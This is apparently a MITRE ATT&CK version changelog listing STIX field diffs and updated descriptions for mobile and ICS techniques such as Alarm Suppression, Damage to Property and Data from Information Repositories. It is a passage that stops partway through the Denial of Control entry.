values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-20 18:57:14.285000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1631.001] Process Injection: Ptrace System Calls

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 17:05:37.431000+00:002023-03-20 18:57:40.571000+00:00
external_references[1]['source_name']PTRACE manBH Linux Inject
external_references[1]['description']Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.
external_references[1]['url']http://man7.org/linux/man-pages/man2/ptrace.2.htmlhttps://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf
external_references[3]['source_name']BH Linux InjectPTRACE man
external_references[3]['description']Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.
external_references[3]['url']https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdfhttp://man7.org/linux/man-pages/man2/ptrace.2.html
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1430.001] Location Tracking: Remote Device Management Services

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 13:44:31.305000+00:002023-03-20 18:58:20.113000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1582] SMS Control

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
external_referencesGoogle. (n.d.). SmsProvider.java. Retrieved September 11, 2020.
external_referencesS.Main, D. Braun. (2013, October 14). Getting Your SMS Apps Ready for KitKat. Retrieved September 11, 2020.
external_referencesAPP-16
external_referencesCEL-41
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesAPP-16
external_referencesCEL-41
external_referencesS.Main, D. Braun. (2013, October 14). Getting Your SMS Apps Ready for KitKat. Retrieved September 11, 2020.
external_referencesGoogle. (n.d.). SmsProvider.java. Retrieved September 11, 2020.
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-20 18:58:57.001000+00:00
external_references[1]['source_name']NIST Mobile Threat CatalogueAndroid SmsProvider
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.htmlhttps://android.googlesource.com/platform/packages/providers/TelephonyProvider/+/7e7c274/src/com/android/providers/telephony/SmsProvider.java
external_references[2]['source_name']NIST Mobile Threat CatalogueSMS KitKat
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-41.htmlhttps://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html
external_references[3]['source_name']SMS KitKatNIST Mobile Threat Catalogue
external_references[3]['url']https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.htmlhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html
external_references[4]['source_name']Android SmsProviderNIST Mobile Threat Catalogue
external_references[4]['url']https://android.googlesource.com/platform/packages/providers/TelephonyProvider/+/7e7c274/src/com/android/providers/telephony/SmsProvider.javahttps://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-41.html
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1636.004] Protected User Data: SMS Messages

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 19:40:28.979000+00:002023-03-20 18:58:33.873000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1513] Screen Capture

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-01 13:31:00.559000+00:002023-03-20 18:57:43.022000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[T1418.001] Software Discovery: Security Software Discovery

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 19:17:09.165000+00:002023-03-20 18:55:33.642000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1418] Software Discovery

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-03-30 20:41:40.719000+00:002023-03-20 18:55:03.477000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1406.002] Obfuscated Files or Information: Software Packing

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21 17:32:15.993000+00:002023-03-20 18:54:40.501000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1635] Steal Application Access Token

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 17:11:24.641000+00:002023-03-20 18:53:52.292000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1409] Stored Application Data

Current version: 3.1

Version changed from: 3.0 → 3.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 19:41:54.022000+00:002023-03-20 18:53:16.029000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.03.1

[T1632] Subvert Trust Controls

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-08 15:47:12.903000+00:002023-03-20 18:52:52.097000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1474] Supply Chain Compromise

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-03-28 19:41:56.018000+00:002023-03-20 18:52:29.947000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1628.001] Hide Artifacts: Suppress Application Icon

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-20 17:16:08.997000+00:002023-03-20 18:51:29.931000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1633.001] Virtualization/Sandbox Evasion: System Checks

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21 17:34:12.113000+00:002023-03-20 18:51:04.432000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1422] System Network Configuration Discovery

Current version: 2.3

Version changed from: 2.2 → 2.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-03-30 21:04:12.723000+00:002023-03-20 18:50:32.697000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.22.3

[T1625.001] Hijack Execution Flow: System Runtime API Hijacking

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:52:49.037000+00:002023-03-20 18:46:08.412000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1641.001] Data Manipulation: Transmitted Data Manipulation

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21 17:34:52.311000+00:002023-03-20 18:44:26.748000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1635.001] Steal Application Access Token: URI Hijacking

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 12:44:03.799000+00:002023-03-20 18:43:49.443000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1630.001] Indicator Removal on Host: Uninstall Malicious Application

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21 17:33:44.504000+00:002023-03-20 18:43:03.218000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1623.001] Command and Scripting Interpreter: Unix Shell

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:45:47.619000+00:002023-03-20 18:41:18.389000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1512] Video Capture

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-08 15:58:43.813000+00:002023-03-20 18:38:27.848000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1633] Virtualization/Sandbox Evasion

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-08 15:47:37.920000+00:002023-03-20 18:37:57.884000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1481] Web Service

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 15:35:05.775000+00:002023-03-20 18:37:13.730000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

ics-attack

New Techniques

[T0892] Change Credential

Current version: 1.0

Description: Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces. An adversary with access to valid or hardcoded credentials could change the credential to prevent future authorized device access. Change Credential may be especially damaging when paired with other techniques such as Modify Program, Data Destruction, or Modify Controller Tasking. In these cases, a device’s configuration may be destroyed or include malicious actions for the process environment, which cannot not be removed through normal device configuration actions. Additionally, recovery of the device and original configuration may be difficult depending on the features provided by the device. In some cases, these passwords cannot be removed onsite and may require that the device be sent back to the vendor for additional recovery steps. A chain of incidents occurred in Germany, where adversaries locked operators out of their building automation system (BAS) controllers by enabling a previously unset BCU key. (Citation: German BAS Lockout Dec 2021)


[T0893] Data from Local System

Current version: 1.0

Description: Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Adversaries may do this using [Command-Line Interface](https://attack.mitre.org/techniques/T0807) or [Scripting](https://attack.mitre.org/techniques/T0853) techniques to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T0802) on the local system.

Minor Version Changes

[T0878] Alarm Suppression

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may target protection function alarms to preventt1Adversaries may target protection function alarms to prevent
> them from notifying operators of critical conditions. Alarm> them from notifying operators of critical conditions. Alarm
> messages may be a part of an overall reporting system and o> messages may be a part of an overall reporting system and o
>f particular interest for adversaries. Disruption of the ala>f particular interest for adversaries. Disruption of the ala
>rm system does not imply the disruption of the reporting sys>rm system does not imply the disruption of the reporting sys
>tem as a whole.  A Secura presentation on targeting OT notes>tem as a whole.  A Secura presentation on targeting OT notes
> a dual fold goal for adversaries attempting alarm suppressi> a dual fold goal for adversaries attempting alarm suppressi
>on: prevent outgoing alarms from being raised and prevent in>on: prevent outgoing alarms from being raised and prevent in
>coming alarms from being responded to. (Citation: Jos Wetzel>coming alarms from being responded to. (Citation: Jos Wetzel
>s, Marina Krotofil 2019) The method of suppression may great>s, Marina Krotofil 2019) The method of suppression may great
>ly depend on the type of alarm in question:    * An alarm ra>ly depend on the type of alarm in question:    * An alarm ra
>ised by a protocol message  * An alarm signaled with I/O  * >ised by a protocol message  * An alarm signaled with I/O  * 
>An alarm bit set in a flag (and read)   In ICS environments,>An alarm bit set in a flag (and read)   In ICS environments,
> the adversary may have to suppress or contend with multiple> the adversary may have to suppress or contend with multiple
> alarms and/or alarm propagation to achieve a specific goal > alarms and/or alarm propagation to achieve a specific goal 
>to evade detection or prevent intended responses from occurr>to evade detection or prevent intended responses from occurr
>ing. (Citation: Jos Wetzels, Marina Krotofil 2019)  Methods >ing. (Citation: Jos Wetzels, Marina Krotofil 2019)  Methods 
>of suppression may involve tampering or altering device disp>of suppression may involve tampering or altering device disp
>lays and logs, modifying in memory code to fixed values, or >lays and logs, modifying in memory code to fixed values, or 
>even tampering with assembly level instruction code.  In the>even tampering with assembly level instruction code.
> Maroochy Shire attack, the adversary suppressed alarm repor 
>ting to the central computer.(Citation: Marshall Abrams July 
> 2008) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:15:39.012000+00:002023-03-30 20:13:55.599000+00:00
descriptionAdversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole. A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: * An alarm raised by a protocol message * An alarm signaled with I/O * An alarm bit set in a flag (and read) In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code. In the Maroochy Shire attack, the adversary suppressed alarm reporting to the central computer.(Citation: Marshall Abrams July 2008)Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole. A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: * An alarm raised by a protocol message * An alarm signaled with I/O * An alarm bit set in a flag (and read) In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[2]Operational Databases: Process/Event AlarmOperational Databases: Process History/Live Data
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesOperational Databases: Process/Event Alarm
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'}
x_mitre_data_sourcesOperational Databases: Process History/Live Data

[T0806] Brute Force I/O

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may repetitively or successively change I/O point1Adversaries may repetitively or successively change I/O poin
>t values to perform an action. Brute Force I/O may be achiev>t values to perform an action. Brute Force I/O may be achiev
>ed by changing either a range of I/O point values or a singl>ed by changing either a range of I/O point values or a singl
>e point value repeatedly to manipulate a process function. T>e point value repeatedly to manipulate a process function. T
>he adversarys goal and the information they have about the t>he adversary's goal and the information they have about the 
>arget environment will influence which of the options they c>target environment will influence which of the options they 
>hoose. In the case of brute forcing a range of point values,>choose. In the case of brute forcing a range of point values
> the adversary may be able to achieve an impact without targ>, the adversary may be able to achieve an impact without tar
>eting a specific point. In the case where a single point is >geting a specific point. In the case where a single point is
>targeted, the adversary may be able to generate instability > targeted, the adversary may be able to generate instability
>on the process function associated with that particular poin> on the process function associated with that particular poi
>t.   Adversaries may use Brute Force I/O to cause failures w>nt.   Adversaries may use Brute Force I/O to cause failures 
>ithin various industrial processes. These failures could be >within various industrial processes. These failures could be
>the result of wear on equipment or damage to downstream equi> the result of wear on equipment or damage to downstream equ
>pment.>ipment.
Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-20 19:28:07.225000+00:002023-03-29 16:17:27.903000+00:00
descriptionAdversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversarys goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. Adversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. Adversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Operational Databases: Process History/Live DataApplication Log: Application Log Content
x_mitre_data_sources[2]Application Log: Application Log ContentOperational Databases: Process History/Live Data
x_mitre_version1.01.1

[T0879] Damage to Property

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may cause damage and destruction of property to t1Adversaries may cause damage and destruction of property to 
>infrastructure, equipment, and the surrounding environment w>infrastructure, equipment, and the surrounding environment w
>hen attacking control systems. This technique may result in >hen attacking control systems. This technique may result in 
>device and operational equipment breakdown, or represent tan>device and operational equipment breakdown, or represent tan
>gential damage from other techniques used in an attack. Depe>gential damage from other techniques used in an attack. Depe
>nding on the severity of physical damage and disruption caus>nding on the severity of physical damage and disruption caus
>ed to control processes and systems, this technique may resu>ed to control processes and systems, this technique may resu
>lt in [Loss of Safety](https://attack.mitre.org/techniques/T>lt in [Loss of Safety](https://attack.mitre.org/techniques/T
>0880). Operations that result in [Loss of Control](https://a>0880). Operations that result in [Loss of Control](https://a
>ttack.mitre.org/techniques/T0827) may also cause damage to p>ttack.mitre.org/techniques/T0827) may also cause damage to p
>roperty, which may be directly or indirectly motivated by an>roperty, which may be directly or indirectly motivated by an
> adversary seeking to cause impact in the form of [Loss of P> adversary seeking to cause impact in the form of [Loss of P
>roductivity and Revenue](https://attack.mitre.org/techniques>roductivity and Revenue](https://attack.mitre.org/techniques
>/T0828).   In the Maroochy Shire attack, the adversary gaine>/T0828).    The German Federal Office for Information Securi
>d remote computer access to the control system and altered d>ty (BSI) reported a targeted attack on a steel mill under an
>ata so that whatever function should have occurred at affect> incidents affecting business section of its 2014 IT Securit
>ed pumping stations did not occur or occurred in a different>y Report. (Citation: BSI State of IT Security 2014)  These t
> way. This ultimately led to 800,000 liters of raw sewage be>argeted attacks affected industrial operations and resulted 
>ing spilled out into the community. The raw sewage affected >in breakdowns of control system components and even entire i
>local parks, rivers, and even a local hotel. This resulted i>nstallations. As a result of these breakdowns, massive impac
>n harm to marine life and produced a sickening stench from t>t and damage resulted from the uncontrolled shutdown of a bl
>he community's now blackened rivers.(Citation: Marshall Abra>ast furnace.   A Polish student used a remote controller dev
>ms July 2008)  The German Federal Office for Information Sec>ice to interface with the Lodz city tram system in Poland. (
>urity (BSI) reported a targeted attack on a steel mill under>Citation: John Bill May 2017) (Citation: Shelley Smith Febru
> an incidents affecting business section of its 2014 IT Secu>ary 2008) (Citation: Bruce Schneier January 2008) Using this
>rity Report. (Citation: BSI State of IT Security 2014)  Thes> remote, the student was able to capture and replay legitima
>e targeted attacks affected industrial operations and result>te tram signals. This resulted in damage to impacted trams, 
>ed in breakdowns of control system components and even entir>people, and the surrounding property. Reportedly, four trams
>e installations. As a result of these breakdowns, massive im> were derailed and were forced to make emergency stops. (Cit
>pact and damage resulted from the uncontrolled shutdown of a>ation: Shelley Smith February 2008) Commands issued by the s
> blast furnace.   A Polish student used a remote controller >tudent may have also resulted in tram collisions, causing ha
>device to interface with the Lodz city tram system in Poland>rm to those on board and the environment outside. (Citation:
>. (Citation: John Bill May 2017) (Citation: Shelley Smith Fe> Bruce Schneier January 2008)
>bruary 2008) (Citation: Bruce Schneier January 2008) Using t 
>his remote, the student was able to capture and replay legit 
>imate tram signals. This resulted in damage to impacted tram 
>s, people, and the surrounding property. Reportedly, four tr 
>ams were derailed and were forced to make emergency stops. ( 
>Citation: Shelley Smith February 2008) Commands issued by th 
>e student may have also resulted in tram collisions, causing 
> harm to those on board and the environment outside. (Citati 
>on: Bruce Schneier January 2008) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:12:38.570000+00:002023-03-30 20:14:42.829000+00:00
descriptionAdversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). In the Maroochy Shire attack, the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community's now blackened rivers.(Citation: Marshall Abrams July 2008) The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)
kill_chain_phases[0]['phase_name']impact-icsimpact
external_references[4]['source_name']Marshall Abrams July 2008Shelley Smith February 2008
external_references[4]['description']Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17
external_references[4]['url']https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdfhttps://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Shelley Smith February 2008', 'description': 'Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ', 'url': 'https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/'}

[T0811] Data from Information Repositories

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may target and collect data from information rept1Adversaries may target and collect data from information rep
>ositories. This can include sensitive data such as specifica>ositories. This can include sensitive data such as specifica
>tions, schematics, or diagrams of control system layouts, de>tions, schematics, or diagrams of control system layouts, de
>vices, and processes. Examples of information repositories i>vices, and processes. Examples of information repositories i
>nclude reference databases or local machines in the process >nclude reference databases in the process environment, as we
>environment, as well as workstations and databases in the co>ll as databases in the corporate network that might contain 
>rporate network that might contain information about the ICS>information about the ICS.(Citation: Cybersecurity & Infrast
>.(Citation: Cybersecurity & Infrastructure Security Agency M>ructure Security Agency March 2018)  Information collected f
>arch 2018)  Information collected from these systems may pro>rom these systems may provide the adversary with a better un
>vide the adversary with a better understanding of the operat>derstanding of the operational environment, vendors used, pr
>ional environment, vendors used, processes, or procedures of>ocesses, or procedures of the ICS.  In a campaign between 20
> the ICS.  In a campaign between 2011 and 2013 against ONG o>11 and 2013 against ONG organizations, Chinese state-sponsor
>rganizations, Chinese state-sponsored actors searched docume>ed actors searched document repositories for specific inform
>nt repositories for specific information such as, system man>ation such as, system manuals, remote terminal unit (RTU) si
>uals, remote terminal unit (RTU) sites, personnel lists, doc>tes, personnel lists, documents that included the string SCA
>uments that included the string SCAD*, user credentials, and>D*, user credentials, and remote dial-up access information.
> remote dial-up access information. (Citation: CISA AA21-201> (Citation: CISA AA21-201A Pipeline Intrusion July 2021)
>A Pipeline Intrusion July 2021) 

Dropped Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 18:05:21.731000+00:002023-03-30 19:09:43.744000+00:00
descriptionAdversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases or local machines in the process environment, as well as workstations and databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018) Information collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS. In a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018) Information collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS. In a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)
kill_chain_phases[0]['phase_name']collection-icscollection
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]Process: OS API ExecutionApplication Log: Application Log Content
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesScript: Script Execution
x_mitre_data_sourcesFile: File Access
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_platformsControl Server
x_mitre_platformsEngineering Workstation
x_mitre_platformsHuman-Machine Interface

[T0813] Denial of Control

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may cause a denial of control to temporarily pret1Adversaries may cause a denial of control to temporarily pre
>vent operators and engineers from interacting with process c>vent operators and engineers from interacting with process c
>ontrols. An adversary may attempt to deny process control ac>ontrols. An adversary may attempt to deny process control ac
>cess to cause a temporary loss of communication with the con>cess to cause a temporary loss of communication with the con
>trol device or to prevent operator adjustment of process con>trol device or to prevent operator adjustment of process con
>trols. An affected process may still be operating during the>trols. An affected process may still be operating during the
> period of control loss, but not necessarily in a desired st> period of control loss, but not necessarily in a desired st
>ate. (Citation: Corero) (Citation: Michael J. Assante and Ro>ate. (Citation: Corero) (Citation: Michael J. Assante and Ro
>bert M. Lee) (Citation: Tyson Macaulay)  In the Maroochy Shi>bert M. Lee) (Citation: Tyson Macaulay)  In the 2017 Dallas 
>re attack, the adversary temporarily shut an investigator ou>Siren incident operators were unable to disable the false al
>t of the network preventing them from issuing any controls.(>arms from the Office of Emergency Management headquarters. (
>Citation: Marshall Abrams July 2008)  In the 2017 Dallas Sir>Citation: Mark Loveless April 2017)
>en incident operators were unable to disable the false alarm 
>s from the Office of Emergency Management headquarters. (Cit 
>ation: Mark Loveless April 2017) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:09:55.792000+00:002023-03-30 20:15:14.260000+00:00
